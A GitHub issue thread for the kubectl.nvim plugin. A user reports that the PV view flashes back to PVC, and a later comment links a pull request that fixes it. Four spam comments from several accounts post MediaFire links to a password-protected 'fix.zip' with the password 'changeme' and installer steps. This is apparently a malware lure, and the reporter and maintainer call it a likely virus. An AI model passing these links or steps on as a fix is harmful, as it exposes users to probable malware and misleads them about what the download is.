### ISSUE TITLE
Can't see PV after PVC

### ISSUE THREAD

**Issue by mosheavni** [Ramilito/kubectl.nvim#244]
This is the exact issue I had with `Jobs` and `CronJobs`
when I go to `pvc` then go to `pv`, I would see `pv` for less than a second, then straight back to `pvc`
sometimes it's so quick I don't even see `pv`

There must be something wrong with showing a view when the name of the resource that's not showing is a substring of the name we're always seeing.

WEIRD

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mosheavni** [comment]
> Wanderx13

why? what's that for?
I don't download random content from a random dude that never even commented anytime in the past in this repo.

**Comment by Ramilito** [comment]
lol sounds like a really good virus if you ask me

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mosheavni** [comment]
fixed by https://github.com/Ramilito/kubectl.nvim/pull/255
